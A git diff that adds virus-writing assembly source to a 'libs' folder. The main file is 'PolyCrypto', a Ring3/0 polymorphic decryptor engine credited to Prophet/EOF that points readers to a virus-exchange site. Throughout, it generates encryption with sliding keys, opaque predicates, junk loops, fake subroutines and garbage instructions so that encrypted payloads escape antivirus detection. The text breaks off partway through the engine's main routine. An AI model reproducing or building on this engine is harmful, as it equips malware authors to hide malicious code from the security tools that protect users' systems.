+                and     ebx,80000001h           ; \
+                ror     bx,1                    ;  \
+                mov     edx,ebx                 ;   \
+                ror     ebx,16                  ;    module 2 addition
+                xor     bx,dx                   ;   /
+                rcl     ebx,17                  ;  /
+                rcr     eax,1                   ; /
+                loop    msg_next_bit
+                mov     [esp+28],esi
+                popad
+                ret
+
+
+;
+; __random_rdtsc procedure
+; ========================
+;
+;
+; Description
+; -----------
+;
+; This is the simplest RNG in the packet. Well, nothing to explain :P
+;
+;
+; Parameterz and Return Value
+; ---------------------------
+;
+; input:
+;       ecx --- the range of the random number to be generated
+;
+; output:
+;       eax --- random number as result
+;
+
+__random_rdtsc: pushad
+                db      0fh,31h
+                add     eax,edx
+                xor     edx,edx
+                or      ecx,ecx
+                jz      rnd_rdt_no_range
+                div     ecx
+                xchg    eax,edx
+rnd_rdt_no_range:
+                mov     [esp+28],eax
+                popad
+                ret
\ No newline at end of file
diff --git a/libs/VirTool.Win32.Cryptor.PolyCrypto.inc b/libs/VirTool.Win32.Cryptor.PolyCrypto.inc
new file mode 100644
index 00000000..76c0d309
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.PolyCrypto.inc
@@ -0,0 +1,1807 @@
+;---------------------------------------------------------------------------------------------------------;
+;                               __         __               ___ __  ___                                   ;
+;                              /  )_ _ /  /__)_     / _ _/ (_  /  )(_                                     ;
+;                             /(_/(// /( /   / ()/)/)(- /  /__(__/ /                                      ; 
+;                                               /                                                         ;
+;													  ;	
+;                                           __                                                            ;
+;                                          /__)_ _  _ _  _/                                               ;
+;                                         /   / (-_) (-/)/                                                ;    
+;                                                                                                         ;
+;          												  ;	
+;              _____       ___     ___                                                                    ;
+;             /\  __`\   /'___\  /'___\                          __                                       ; 
+;             \ \ \/\ \ /\ \__/ /\ \__/    __     ___      ____ /\_\   __  __     __                      ;
+;              \ \ \ \ \\ \ ,__\\ \ ,__\ /'__`\ /' _ `\   /',__\\/\ \ /\ \/\ \  /'__`\                    ;
+;               \ \ \_\ \\ \ \_/ \ \ \_//\  __/ /\ \/\ \ /\__, `\\ \ \\ \ \_/ |/\  __/                    ;
+;                \ \_____\\ \_\   \ \_\ \ \____\\ \_\ \_\\/\____/ \ \_\\ \___/ \ \____\                   ;
+;                 \/_____/ \/_/    \/_/  \/____/ \/_/\/_/ \/___/   \/_/ \/__/   \/____/                   ;
+;                                                                                                         ; 
+;                                                                                                         ;
+;  ____         ___                ____                                                    ___            ;
+; /\  _`\      /\_ \              /\  _`\                     __                         /'___`\          ;
+; \ \ \L\ \ ___\//\ \    __  __   \ \ \L\_\    ___       __  /\_\     ___       __      /\_\ /\ \         ;
+;  \ \ ,__// __`\\ \ \  /\ \/\ \   \ \  _\L  /' _ `\   /'_ `\\/\ \  /' _ `\   /'__`\    \/_/// /__        ;
+;   \ \ \//\ \L\ \\_\ \_\ \ \_\ \   \ \ \L\ \/\ \/\ \ /\ \L\ \\ \ \ /\ \/\ \ /\  __/       // /_\ \       ;
+;    \ \_\\ \____//\____\\/`____ \   \ \____/\ \_\ \_\\ \____ \\ \_\\ \_\ \_\\ \____\     /\______/       ;
+;     \/_/ \/___/ \/____/ `/___/> \   \/___/  \/_/\/_/ \/___L\ \\/_/ \/_/\/_/ \/____/     \/_____/        ;
+;                            /\___/                      /\____/                                          ;
+;                            \/__/                       \_/__/                                           ;
+;                                                                                                         ;
+;                     											  ;	
+;													  ;	 				
+;v0.8 (beta) public version										  ;		
+;---------------------------------------------------------------------------------------------------------;
+; Ring3/0 Polymorphic Decryptor Creator 
+; 
+; Features 
+;
+;Generates:
+;
+;Memory Read/Write 
+;Loops , Predicates
+;Subroutines
+;
+;Realistic Garbage
+;Position Independent
+;Sliding Key  
+;
+;This is not final version. Many improvements are planned. (Apis , PRIDE , SSE/FPU instructions)
+;Watch eof-project.net or vx.netlux.org for new releases
+; 
+;Prophet/EOF(24.8.2009)
+;
+poly_vars struct
+					; VARIABLES INITIALIZED BEFORE POLY CALL
+					poly_ptr_code_base_va  	  dd 	?      ;   virtual-address of encrypted code 
+					poly_ptr_code_base_raw    dd 	?      ;   raw-address of encrypted code
+					poly_ptr_decrypt_buf_va   dd    ?      ;   Va of buffer where code will be decrypted (0 if dont move code)
+					poly_code_size 	  	  dd 	?      ;   size of code to crypt
+					poly_code_entry_offset    dd    ?      ;   ep offset relative to code_base_va  
+					poly_decryptor_base       dd 	?      ;   ptr to buffer where decrytor will be created
+					poly_decryptor_base_va 	  dd 	?      ;   virtual-address of decryptor base   
+					poly_decryptor_size       dd    ?      ;   size of created decryptor 
+					poly_options              dd 	?      ;   poly options 
+					poly_garbage_level        dd 	?      ;   level of garbage (1-lowest 3-average 5-huge)
+					poly_read_mem_base        dd    ?      ;   va address of readable memory 
+					poly_read_mem_size        dd    ?      ;   size of readable memory 
+	
+					; VARIABLES USED DURING POLY ENGINE RUN
+					poly_algo1  		  dd 	?      ;   crypt algorythm
+					poly_algo2  		  dd 	?      ;   key-sliding algorythm 
+					poly_key    		  dd 	?      ;   encrypt key
+					poly_slide_key 		  dd 	?      ;   slide key 
+					poly_ptr_reg   		  dd 	?      ;   register used as ptr to memory
+					poly_key_reg   		  dd 	?      ;   register which is keeping decrypt key 
+					poly_loop_reg  		  dd 	?      ;   loop counter
+					poly_store_reg            dd    ?      ;   used in move-data loop 
+					poly_junk_mem_reg	  dd    ?      ;   junk mem accesses ptr reg 
+					poly_junk_mem_pos         dd    ?      ;   value to which reg was initialized 
+					poly_reg_usage 		  dd 	?      ;   watch register usage 	 
+					poly_random_seed 	  dd 	?      ;   random seed
+					poly_garbler_flags 	  dd 	?      ;   keep garbler state
+					poly_entry_offset         dd    ?      ;   offset of poly entry-point relative to poly base 
+					
+					poly_subroutines_count    dd    ?      ;   number of poly subs generated 
+					poly_subroutines_table    db    1024 DUP(0)
+poly_vars ends
+
+;
+;	Poly Options Flags 
+;
+					
+					POLY_OPT_POS_INDEPENDENT equ 	1      ;   use/dont use delta offset in decryptor 
+					POLY_OPT_STACK_WRITES    equ 	2      ;   (not implemented)
+					POLY_OPT_MEM_WRITES      equ 	4      ;   ( buggy ) 
+					POLY_OPT_USE_SUBROUTINES equ 	8      ;   generate junk subroutines 
+					POLY_OPT_MEM_ACC_DIRECT  equ 	16     ;   do direct mem accesses (dont use if pe is reloc-able)
+					POLY_OPT_MINIMAL_GARBAGE equ 	32     ;   generate minimal amount of garbage 
+
+;
+;	Poly configuration  
+;
+;					POLY_DEBUG              equ 	1      ;   poly-debugging regime (comment out to disable) 
+;                   			POLY_DISABLE_GARBAGE    equ 	1      ;   disable garbage generator (comment out to enable) 
+					POLY_SUBROUTINES_MAX    equ 	5      ;   max count of poly subroutines 
+					POLY_SUBR_PARAMS_MAX    equ 	6      ;   max count of sub arguments 
+;					POLY_ALIGN_SUBR         equ 	1      ;   align subroutines to 0fh (comment out to disable)
+					POLY_ALIGN_BYTE         equ 	0cch   ;   alignment byte 
+					POLY_ESP_ACC_RNG_MAX    equ 	10     ;   max stack access displacement [esp +- random(max) * 4]
+					POLY_LOOP_ITERATION_MAX equ 	10000h ;   max loop iterations
+					POLY_LOOP_ITERATION_MIN equ 	1000h  ;   min loop iterations 
+					
+;
+;	Occurence of garbage 
+;				
+					POLY_OCCUR_LOOP         equ     2
+					POLY_OCCUR_PREDICATE    equ     5
+					POLY_OCCUR_PUSH_POP     equ     7
+					POLY_OCCUR_CALL         equ	2
+					POLY_OCCUR_API          equ	0      ;   not implemented
+					POLY_OCCUR_IMM          equ 	5 
+					POLY_OCCUR_MODRM        equ     12
+					
+					POLY_OCCUR_COUNT equ  ( POLY_OCCUR_LOOP + POLY_OCCUR_PREDICATE + POLY_OCCUR_PUSH_POP + POLY_OCCUR_CALL + POLY_OCCUR_API + POLY_OCCUR_IMM + POLY_OCCUR_MODRM )
+					
+					POLY_MODRM_OCCUR_REG_REG equ 	0
+					POLY_MODRM_OCCUR_MEM     equ 	0
+					POLY_MODRM_OCCUR_STACK   equ 	0
+									    
+;
+;	Garbler state flags
+;
+
+					POLY_FLAG_IN_LOOP  equ 	1 ; in loop 
+					POLY_FLAG_IN_SUBR  equ 	2 ; in subroutine 
+					POLY_FLAG_IN_PRED  equ  4 ; in predicate 
+
+					assume ebp:ptr poly_vars
+.code
+PolyEngineEntry:			jmp PolyEngine
+					
+PolyGarbleInit:     			pushad
+					
+					; check if subroutines flag is set 
+					mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_USE_SUBROUTINES
+					test eax,eax
+					jz Garble_Init_No_Sub
+										
+					; create junk subroutines 
+					mov eax,POLY_SUBROUTINES_MAX
+					call random
+					test eax,eax
+					jz PolyGarbleInitEnd
+					
+					mov ecx,eax
+					
+Garble_Init_Loop1:  			call Garble_Create_funct					
+					loop Garble_Init_Loop1
+					
+Garble_Init_No_Sub:			mov dword ptr [esp],edi
+
+PolyGarbleInitEnd:			popad 
+					retn
+
+;
+;	Garbage creator for use in poly engine 
+;					 	 
+; ESP,EBP must be set as used before calling PolyGarbler 
+
+; ebp = ptr to poly struct
+; edi = buffer  
+PolyGarble:		
+ifndef POLY_DISABLE_GARBAGE
+					pushad
+					
+					mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_MINIMAL_GARBAGE
+					test eax,eax 
+					jz PolyGarbleNormal
+					
+					mov ecx,1
+					jmp PolyGarbleCont1  
+
+PolyGarbleNormal:			mov ecx,dword ptr [ebp].poly_garbage_level ; deepness of recursivity
+					imul ecx,3
+					
+PolyGarbleCont1:			call Garble 
+	
+					mov dword ptr [esp],edi
+					popad
+endif ;POLY_DISABLE_GARBAGE					  
+					retn 
+					
+;
+;	Recursive Garbler 
+;					
+
+Garble:				
+					mov eax,POLY_OCCUR_COUNT
+					call random
+					
+					cmp eax,POLY_OCCUR_PUSH_POP
+					jb G_Push_Pop
+					sub eax,POLY_OCCUR_PUSH_POP 
+					
+					cmp eax,POLY_OCCUR_PREDICATE
+					jb G_Predicate
+					sub eax,POLY_OCCUR_PREDICATE 
+					
+					cmp eax,POLY_OCCUR_LOOP
+					jb G_Loop
+					sub eax,POLY_OCCUR_LOOP
+					
+					cmp eax,POLY_OCCUR_CALL
+					jb G_Call
+					sub eax,POLY_OCCUR_CALL 
+					
+;					cmp eax,POLY_OCCUR_MODRM
+					
+					cmp eax,POLY_OCCUR_IMM
+					jb G_Imm
+					sub eax,POLY_OCCUR_IMM  
+					
+;					cmp eax,POLY_OCCUR_API
+
+					call Garble_Create_Modrm
+					jmp Garble_cont
+					
+; loop 
+G_Loop:					call Garble_Loop	
+					jmp Garble_cont
+					
+; opaque predicate					
+G_Predicate: 				call Garble_Predicate 					
+					jmp Garble_cont
+
+; push pop 					
+G_Push_Pop:				call Garble_Push_Pop
+					jmp Garble_cont
+
+G_Modrm:				jmp Garble_cont
+
+; immediate
+G_Imm:					call Garble_Create_Imm
+					jmp Garble_cont
+; call to junk proc 
+G_Call:					call Garble_Sub_Call
+
+Garble_cont:				test ecx,ecx
+					jz GarbleEnd
+					dec ecx
+					 
+					call Garble  
+GarbleEnd:				retn
+
+;
+; 	Create Opaque predicate 
+;
+Garble_Predicate:   			cmp ecx,4
+					jbe Garble_Predict_End
+					
+					cmp ecx,10
+					ja Garble_Predict_End ; just temporal solution to short-near problem 
+					
+					call Is_In_Pred
+					test eax,eax
+					jnz Garble_Predict_End
+					
+					mov eax,8
+					call random 
+					test eax,eax
+					jnz Garble_Predict_Jcc
+					
+; JMP 									
+					mov eax,0ebh
+					stosb
+					push edi
+					
+					jmp Garble_Predict_C 
+Garble_Predict_Jcc:			call Garble_Create_Cmp
+					
+					mov eax,10h
+					call random
+					add eax,70h
+					stosb
+					push edi
+					inc edi
+				
+Garble_Predict_C:			call Set_In_Pred
+
+					dec ecx
+					call Garble ; recursive call
+					pop ebx
+					
+					call Set_In_Pred
+				
+					mov eax,edi
+					sub eax,ebx
+					dec eax
+					mov byte ptr [ebx],al    
+	
+Garble_Predict_End: 			retn
+
+
+;
+; Create push/pop
+;
+Garble_Push_Pop:			cmp ecx,2
+					jbe Garble_Push_Pop_End
+					 
+					call Garble_Create_Push
+					
+					dec ecx
+					call Garble ; recursive call 
+					
+					call get_free_reg_32_no_set
+					cmp eax,-1
+					jne Garble_Push_Pop_c
+					
+					mov eax,0004c483h ; no free reg , create add esp,4
+					stosd
+					dec edi
+					jmp Garble_Push_Pop_End
+					
+Garble_Push_Pop_c:			add al,58h ; pop free reg
+					stosb				
+					 
+Garble_Push_Pop_End:			retn
+
+;
+;	Generate Loop 
+; 
+
+Garble_Loop: 				call Is_In_Loop
+					test eax,eax
+					jnz Garble_Loop_End
+					
+					cmp ecx,5
+					jbe Garble_Loop_End
+					
+					call get_free_reg_32
+					cmp eax,-1
+					je Garble_Loop_End
+					
+					call Set_In_Loop ; set that we are in loop 
+					
+					mov ebx,eax
+					mov eax,POLY_LOOP_ITERATION_MAX ; max number of loop iterations
+					call random
+					add eax,POLY_LOOP_ITERATION_MIN   ; minimal iterations count
+					push ecx 
+					mov ecx,eax 
+					  
+					; initialize loop counter register
+					call Asm_Mov_Reg_Imm_32
+					pop ecx
+					
+					; save loop start
+ 					push edi
+ 					; save counter register 
+ 					push ebx
+					
+					dec ecx
+					call Garble
+					pop eax
+					
+					mov ebx,eax
+					call unset_reg_32
+					; dec loop counter
+					mov al,48h
+					add al,bl
+					stosb
+					
+					; test counter reg 
+					mov al,085h
+					stosb
+					
+					mov eax,ebx
+					rol eax,3
+					add eax,ebx 
+					add eax,0c0h
+					stosb 
+					
+					; jcc loop
+					pop eax 
+					sub eax,edi
+					push eax
+					not eax
+					cmp eax,255 / 2
+					pop eax 
+					jbe Garble_Loop_Short 
+					
+					; near jcc 		
+					sub eax,6			
+					mov word ptr [edi],0850fh
+					mov dword ptr [edi + 2],eax
+					add edi,6 
+					
+					jmp Garble_Loop_Cont
+					; short jcc 				
+Garble_Loop_Short:			sub eax,2
+					mov byte ptr [edi],75h ; jnz
+					mov byte ptr [edi + 1],al
+					add edi,2
+					
+Garble_Loop_Cont: 			call Set_In_Loop ; unset in-loop garbler state 					
+					
+Garble_Loop_End:			retn 
+
+;
+;	Generate call to poly subroutine 
+;
+Garble_Sub_Call: 			push ecx
+					push ebx
+					cmp dword ptr [ebp].poly_subroutines_count,0
+					je Garble_Sub_Call_End 
+					
+					call Is_In_Subr ; dont make subroutine call inside subroutine 
+					test eax,eax
+					jnz Garble_Sub_Call_End
+					
+					; pick random  subroutine from table
+					mov eax,dword ptr [ebp].poly_subroutines_count
+					call random
+					lea eax,[eax * 8] 
+					
+					lea ebx,[ebp].poly_subroutines_table
+					add ebx,eax
+					
+					; if junk mem ptr is initialized store it before subroutine call
+					cmp dword ptr [ebp].poly_junk_mem_pos,0
+					je Garble_Sub_No_Save1
+					
+					mov ecx,dword ptr [ebp].poly_junk_mem_reg
+					add ecx,50h
+					mov byte ptr [edi],cl ; push ptr reg 
+					inc edi 
+					
+Garble_Sub_No_Save1:			mov ecx,dword ptr [ebx + 4] ; number of arguments
+					test ecx,ecx
+					jz Garble_Sub_No_Arg
+					
+					; create fake argument passing 
+Garble_Sub_Arg:				call Garble_Create_Push
+					loop Garble_Sub_Arg
+					
+					; create call to function
+Garble_Sub_No_Arg:			mov eax,dword ptr [ebx]
+					sub eax,edi
+					sub eax,5 
+					mov byte ptr [edi],0e8h
+					inc edi
+					stosd   
+					
+					; clean stack from arguments (__cdecl)
+					mov eax,dword ptr [ebx + 4] ; number of function arguments
+					test eax,eax
+					jz Garble_Sub_No_Save2
+					
+					imul eax,4
+					rol eax,16
+					add eax,9000c483h
+					stosd
+					dec edi 
+					
+					; if junk mem ptr is initialized store it before subroutine call
+Garble_Sub_No_Save2:			cmp dword ptr [ebp].poly_junk_mem_pos,0
+					je Garble_Sub_Call_End
+					
+					mov eax,dword ptr [ebp].poly_junk_mem_reg
+					add eax,58h
+					stosb ; pop ptr reg 
+  					
+Garble_Sub_Call_End:			pop ebx 
+					pop ecx
+					retn 
+
+;
+;	Generate Modrm Byte
+;
+
+Garble_Create_Modrm_Byte: 
+					push ebx
+					
+					call get_free_reg_32_no_set
+					cmp eax,-1
+					je Modrm_reg1_reg1 ; no free reg
+					rol eax,3
+					mov ebx,eax
+					
+					mov eax,5
+					call random
+					
+					test eax,eax
+					jz Modrm_Reg_Reg
+					
+					cmp eax,3
+					jb Modrm_Stack_Read  
+;
+; Mem Access
+Modrm_Mem_Acc:				mov eax,3	; 1:2 to do direct mem32 access 
+					call random
+					test eax,eax
+					jz Modrm_Mem_Direct
+					
+					cmp dword ptr [ebp].poly_junk_mem_pos,0
+					je Modrm_Mem_Direct ; junk mem ptr wasnt initialized , do direct mem32 acc anyway 					 
+					
+Modrm_Mem_AccNoDisp:			mov eax,dword ptr [ebp].poly_junk_mem_reg
+					add eax,ebx
+					stosb
+					
+					mov eax,dword ptr [ebp].poly_read_mem_size
+					sub eax,4
+					call random 
+					add eax,dword ptr [ebp].poly_read_mem_base
+					
+					mov ebx,eax
+					sub ebx,dword ptr [ebp].poly_junk_mem_pos
+					
+					mov eax,6 
+					call random
+					
+					cmp eax,0
+					je Modrm_Mem_Disp32
+					
+					cmp eax,4
+					jb Modrm_Mem_Disp8
+					
+					pop ebx
+					retn 
+					
+Modrm_Mem_Disp8:			add byte ptr [edi - 1],40h
+					mov byte ptr [edi],bl
+					inc edi
+					
+					pop ebx
+					retn
+					
+Modrm_Mem_Disp32:   			add byte ptr [edi - 1],80h
+					mov dword ptr [edi],ebx
+					add edi,4  
+
+					pop ebx
+					retn 
+
+;
+;	Direct memory access (mov reg,[mem32]) 
+; only if poly is position independent 
+Modrm_Mem_Direct:			mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_MEM_ACC_DIRECT
+					test eax,eax
+					jnz Modrm_Stack_Read
+					
+					cmp dword ptr [ebp].poly_read_mem_base,0
+					je Modrm_Stack_Read
+
+					mov eax,5
+					add eax,ebx
+					stosb 
+					
+					mov eax,dword ptr [ebp].poly_read_mem_size
+					call random
+					add eax,dword ptr [ebp].poly_read_mem_base
+					
+					stosd 
+					
+					jmp Modrm_End
+					
+; 
+; Stack Access ( reg,[esp/ebp +- x] )					
+Modrm_Stack_Read:   			mov eax,ebx
+					add eax,45h
+					mov byte ptr [edi],al
+				
+   					mov eax,2
+   					call random
+   					test eax,eax
+   					jz Modrm_Stack_Ebp
+					
+					mov byte ptr [edi + 1],24h
+					sub byte ptr [edi],1
+					inc edi
+Modrm_Stack_Ebp:    			inc edi
+
+					mov eax,POLY_ESP_ACC_RNG_MAX 
+					call random 
+					imul eax,4
+					
+					mov ebx,eax
+					mov eax,2 ; +/- disp
+					call random
+					test eax,eax 
+					jz Modrm_Stack_DispPos
+					
+					xor eax,eax
+					sub eax,ebx
+Modrm_Stack_DispPos:			mov byte ptr [edi],al
+ 					inc edi 
+					 
+					jmp Modrm_End
+
+Modrm_Reg_Reg:				call get_reg_32_no_stack
+					add eax,ebx ; free reg 
+					add eax,0c0h
+					stosb
+					jmp Modrm_End 
+
+; in case when no reg is free to use					
+Modrm_reg1_reg1:			call get_reg_32 ; mov eax/eax
+					mov ah,al
+					rol al,3
+					add al,ah
+					add al,0c0h
+					stosb  					
+					
+Modrm_End:				pop ebx
+					retn
+					
+;
+;	Generate CMP/TEST
+;
+Garble_Create_Cmp:  			mov eax,4
+					cmp eax,0
+					je Garble_Cmp_Imm
+					
+					cmp eax,1
+					je Garble_Cmp_Test   
+
+Garble_Cmp_Cmp:				mov eax,2
+					call random
+					add eax,38h
+					stosb 
+					call Garble_Create_Modrm_Byte
+					retn 
+					
+Garble_Cmp_Test:			mov eax,2
+					call random
+					add eax,84h
+					stosb					
+					call Garble_Create_Modrm_Byte
+					retn
+					
+Garble_Cmp_Imm:				push ebx
+					push ecx 
+					
+					mov eax,3
+					call random 
+					mov ebx,eax
+					add eax,81h
+					stosb 
+					
+					mov ecx,edi
+					call Garble_Create_Modrm_Byte
+					
+					and byte ptr [ecx],11000111b
+					add byte ptr [ecx],7 SHL 3
+					
+					mov eax,-1
+					call random
+					
+					test ebx,ebx
+					jnz Garble_Cmp_Imm8
+					
+					stosd
+					jmp Garble_Cmp_ImmC
+					
+Garble_Cmp_Imm8:			stosb
+
+Garble_Cmp_ImmC: 			pop ecx
+					pop ebx  
+					
+					retn 
+
+				
+;
+;	Generate Push 
+;
+
+Garble_Create_Push: 			mov eax,5
+					call random 
+					cmp eax,2
+					jbe Garble_Push_Reg32
+					
+					cmp eax,3
+					je Garble_Push_Modrm
+					
+Garble_Push_Imm:			mov eax,2
+					call random
+					push ebx
+					mov ebx,eax 
+					rol eax,1
+					add eax,68h
+					stosb  
+
+					mov eax,-1
+					call random
+
+					test ebx,ebx
+					pop ebx 
+					jnz Garble_Push_Imm8  
+					;imm32 
+					stosd
+					retn
+Garble_Push_Imm8:			stosb
+					retn
+
+Garble_Push_Reg32:			call get_reg_32
+					add al,50h
+					stosb
+					retn
+
+Garble_Push_Modrm:			mov al,0ffh
+					stosb 
+
+					push edi 
+					call Garble_Create_Modrm_Byte
+					pop eax
+
+					and byte ptr [eax],11000111b
+					add byte ptr [eax],6 SHL 3
+ 	
+					retn 
+;					
+;	Generate Modrm instruction 
+;
+
+;00 ADD
+;08 OR
+;20 AND
+;28 SUB
+;30 XOR
+;88 MOV
+Garble_Create_Modrm:			; 66h prefix ?
+					mov eax,7
+					call random 
+					test eax,eax
+					jnz Garble_Modrm_No_66
+					
+					mov byte ptr [edi],66h ; WORD PTR 
+					inc edi
+
+Garble_Modrm_No_66:			 call is_any_free_32 ; do we have any free reg ?
+					test eax,eax
+					jz Garble_ModrmNo_Regs	
+					
+					push 08202828h
+					push 30300000h
+					push 88888888h
+					mov ebx,esp
+					mov eax,12 
+					call random
+					mov al,byte ptr [ebx + eax]
+					add al,3
+					mov ebx,edi 
+					stosb
+					add esp,12
+					
+					jmp @f
+					
+					; create mov reg1,reg1 as no regs are free
+Garble_ModrmNo_Regs:			mov eax,89h
+					stosb
+					
+@@:					call Garble_Create_Modrm_Byte
+					
+					; test if mem writes are allowed 
+					mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_MEM_WRITES
+					test eax,eax
+					jz Garble_Modrm_Read
+					
+					mov eax,2
+					call random 
+					test eax,eax
+					jnz Garble_Modrm_Read
+					
+					cmp byte ptr [ebx],8dh ; lea 
+					je Garble_Modrm_Read
+	
+					mov al,byte ptr [ebx + 1]
+					and al,11000000b
+					cmp al,0c0h ; mod reg/reg ?
+					je Garble_Modrm_Read 
+
+					mov al,byte ptr [ebx + 1]
+					and al,111b
+					cmp al,100b ; sib  
+					je Garble_Modrm_Read
+					
+					cmp al,101b
+					jne Garble_Modrm_Write
+					
+					mov al,byte ptr [ebx + 1]
+					and al,11000000b
+					test al,al
+					jnz Garble_Modrm_Read
+; do mem write now					  
+Garble_Modrm_Write: 			xor byte ptr [ebx],2h
+					
+Garble_Modrm_Read:			pop ebx 	
+					retn 
+
+;
+;	Generate imm instruction 
+;
+
+Garble_Create_Imm:			push ebx 
+					call get_free_reg_32_no_set
+					mov ebx,eax 
+					cmp eax,-1 
+					je Garble_Create_Imm_E 
+ 
+  					mov eax,5
+  					call random
+  					test eax,eax
+  					jz Garble_Imm_Init_Ptr
+
+					cmp eax,1
+					jbe Garble_Imm_Inc_Dec				
+  					
+  					mov eax,0b8h
+  					add eax,ebx 
+  					stosb
+  					
+  					mov eax,-1
+  					call random 
+  					stosd
+  					
+  					pop ebx
+  					retn 
+  					
+; c1 group 
+; 81 83 group 
+Garble_Imm_Groups:			mov eax,4
+  					call random 
+  					
+ 					push 818383c1h
+ 					mov al,byte ptr [esp + eax]
+ 					add esp,4
+					stosb 
+  					 
+  					call Garble_Create_Modrm_Byte
+  					pop ebx
+  					retn 
+; inc/dec reg 
+Garble_Imm_Inc_Dec:			 mov eax,2
+					call random
+					imul eax,8
+					add eax,40h
+					add eax,ebx
+					stosb 
+					pop ebx
+					retn  					
+  					
+;
+; Initialize pointer 
+Garble_Imm_Init_Ptr:			push ecx
+					
+					call Is_In_Pred ; dont setup ptr in predicate  
+					test eax,eax
+					jnz Garble_Create_ImmE1
+					
+					call Is_In_Loop 
+					test eax,eax
+					jnz Garble_Create_ImmE1 ; dont setup ptr in loop 
+
+					cmp dword ptr [ebp].poly_read_mem_base,0
+					je Garble_Create_ImmE1
+					
+					mov eax,dword ptr [ebp].poly_read_mem_size
+					cmp eax,10
+					jb Garble_Create_ImmE1
+					
+					sub eax,4
+					call random 
+					add eax,dword ptr [ebp].poly_read_mem_base
+					mov ecx,eax
+					
+					cmp dword ptr [ebp].poly_junk_mem_pos,0
+					je Garble_Imm_No_Unset ; reg wasnt set , no need to unset 
+					
+					mov eax,dword ptr [ebp].poly_junk_mem_reg
+					call unset_reg_32 ; release old ptr register
+					
+Garble_Imm_No_Unset:			mov dword ptr [ebp].poly_junk_mem_reg,ebx
+					mov dword ptr [ebp].poly_junk_mem_pos,ecx
+					
+					push eax
+					mov eax,dword ptr [ebp].poly_options
+					and eax,POLY_OPT_MEM_ACC_DIRECT
+					test eax,eax
+					pop eax
+					jz Grable_Imm_indir 
+					call Asm_Mov_Reg_Imm_32 ; FIX HERE call Asm_Init_Ptr
+					jmp @f
+Grable_Imm_indir:			call Asm_Init_Ptr
+					
+@@:					mov eax,ebx
+					call set_reg_32 
+					
+Garble_Create_ImmE1:			pop ecx 
+Garble_Create_Imm_E:			pop ebx
+					retn 
+
+;
+;	Create Junk Function 
+;
+
+Garble_Create_funct:
+					push ebx
+					push ecx
+					mov eax,dword ptr [ebp].poly_subroutines_count
+					imul eax,8 
+					lea ebx,[ebp].poly_subroutines_table
+					add ebx,eax
+					
+					mov dword ptr [ebx],edi ; store subroutine entry to table
+					mov eax,POLY_SUBR_PARAMS_MAX 
+					call random
+					mov dword ptr [ebx + 4],eax ; number of sub params
+					
+					inc dword ptr [ebp].poly_subroutines_count 
+
+					; init stack frame 
+					mov byte ptr [edi],55h 			; push ebp 
+					mov word ptr [edi + 1],0ec8bh	; mov ebp,esp
+					add edi,3
+					
+					mov eax,dword ptr [ebp].poly_garbage_level 
+					imul eax,2
+					call random
+					inc eax 
+					mov ecx,eax
+					
+					call Set_In_Subr ; set in subroutine flag 
+					mov ebx,dword ptr [ebp].poly_reg_usage  ; store reg usage 
+					
+Create_Funct_Loop:			call PolyGarble
+					loop Create_Funct_Loop
+					
+					call Set_In_Subr
+					mov dword ptr [ebp].poly_reg_usage,ebx  ; restore reg usage 
+					
+					mov byte ptr [edi],5dh			; pop ebp
+					mov byte ptr [edi + 1],0c3h     ; retn 
+					add edi,2 
+					
+ifdef POLY_ALIGN_SUBR					
+					; now do the compiler-like 16 align 
+					xor ecx,ecx
+					sub ecx,edi
+					and ecx,0fh
+					mov al,POLY_ALIGN_BYTE
+					
+					test ecx,ecx
+					jz Create_align_End
+					
+					rep stosb					
+					 
+endif ; POLY_ALIGN_SUBR ;					
+					
+Create_align_End:			xor eax,eax 
+					mov dword ptr [ebp].poly_junk_mem_reg,eax ; clear initialized junk mem ptr 
+					mov dword ptr [ebp].poly_junk_mem_pos,eax
+
+					pop ecx  
+					pop ebx  
+					retn 
+					
+;
+;	Standalone Garbage Creator 
+;					
+;  for external use
+;  eax = ptr poly_vars
+;  ecx = amount of garbage
+PolyCreateGarbage:			pushad
+
+					mov ebp,eax
+					
+					call PolyInit
+					call PolyGarbleInit
+					
+					mov edi,dword ptr [ebp].poly_decryptor_base
+					mov eax,edi
+					
+					test ecx,ecx
+					jz @end 
+@@:					call PolyGarble ; Internal poly garbler 					
+					loop @b
+					
+					sub edi,eax
+					mov dword ptr [ebp].poly_decryptor_size,edi
+					mov dword ptr [esp + 1ch],edi ;save size to eax  
+@end:					popad
+					retn					
+
+;					
+; Poly initialization routine
+;
+; ebp = ptr poly_vars  					
+PolyInit:				pushad
+					
+					; fill poly state memory with zeroes 
+					xor eax,eax
+					mov ecx,15
+					lea edi,[ebp].poly_algo1
+					rep stosd
+					
+					; set esp,ebp as used regs 
+					mov eax,4
+					call set_reg_32
+					inc eax
+					call set_reg_32 
+					
+					; init random  seed 
+					rdtsc 
+					mov dword ptr [ebp].poly_random_seed,eax
+
+					popad 
+					retn 				
+				
+;
+;	PolyEngine
+; 
+;	*Create linear decryptor with slide key 
+;					
+
+; _in   eax = ptr to poly struct
+; _out  eax = size of decryptor 
+PolyEngine:				pushad
+
+					mov ebp,eax
+					assume ebp:ptr poly_vars
+					
+					call PolyInit 
+					
+					; choose operations which will be used (xor,add,sub)
+					mov eax,3
+					call random
+					mov dword ptr [ebp].poly_algo1,eax ; crypt algo 
+					
+					mov eax,2
+					call random
+					inc eax ; add/sub only
+					mov dword ptr [ebp].poly_algo2,eax ; slide algo 
+					
+					; choose registers
+					call get_free_reg_32
+					mov dword ptr [ebp].poly_ptr_reg,eax
+	
+					call get_free_reg_32
+					mov dword ptr [ebp].poly_key_reg,eax
+	
+					call get_free_reg_32
+					mov dword ptr [ebp].poly_loop_reg,eax 
+	
+					call generate_key_32  
+					mov dword ptr [ebp].poly_slide_key,eax
+					
+					; apply encryption to data
+					call generate_key_32 
+					call crypt_data 
+					mov dword ptr [ebp].poly_key,eax
+					
+					; start generating decryptor code 
+					mov edi,dword ptr [ebp].poly_decryptor_base
+					
+					; intialize poly garbler
+					call PolyGarbleInit
+					
+					; save poly entry 
+					mov eax,edi
+					sub eax,dword ptr [ebp].poly_decryptor_base
+					mov dword ptr [ebp].poly_entry_offset,eax
+					
+					; CREATE STACK FRAME FOR DECRYPTOR
+					mov byte ptr [edi],55h 			; push ebp 
+					mov word ptr [edi + 1],0ec8bh	; mov ebp,esp
+					add edi,3
+										
+					; GARBLE
+					call PolyGarble
+					
